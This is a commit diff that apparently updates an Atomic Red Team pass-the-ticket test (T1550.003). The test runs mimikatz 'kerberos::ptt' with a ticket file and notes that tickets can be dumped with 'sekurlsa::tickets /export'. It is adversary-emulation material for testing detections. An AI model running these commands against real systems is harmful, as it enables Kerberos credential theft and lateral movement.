T1550.003 pass the ticket by mimikatz patch (#1682)

* Update T1550.003.md

To avoid mimikatz failure and more useful argument description

* Update T1550.003.yaml

To avoid to fail mimikatz  kerberos::ptt and be more easier to understand about argument.

* Update T1550.003.yaml

* Update T1550.003.md

* Update T1550.003.md

* Update T1550.003.yaml

atomics/T1550.003/T1550.003.md

@@ -32,8 +32,7 @@ Similar to PTH, but attacking Kerberos
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| user_name | username | String | Administrator|
-| domain | domain | String | atomic.local|
+| ticket | Ticket file name usually format of 'id-username\@domain\.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) | String | |
 | mimikatz_exe | Path of the Mimikatz binary | Path | PathToAtomicsFolder\T1550.003\bin\mimikatz.exe|
 
 
@@ -41,7 +40,7 @@ Similar to PTH, but attacking Kerberos
 
 
 ```cmd
-#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}
+#{mimikatz_exe} "kerberos::ptt #{ticket}"
 ```
 
 

atomics/T1550.003/T1550.003.yaml

@@ -8,14 +8,10 @@ atomic_tests:
   supported_platforms:
   - windows
   input_arguments:
-    user_name:
-      description: username
+    ticket:
+      description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module)
       type: String
-      default: Administrator
-    domain:
-      description: domain
-      type: String
-      default: atomic.local
+      default:
     mimikatz_exe:
       description: Path of the Mimikatz binary
       type: Path
@@ -35,5 +31,5 @@ atomic_tests:
       Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
   executor:
     command: |
-      #{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}
+      #{mimikatz_exe} "kerberos::ptt #{ticket}"
     name: command_prompt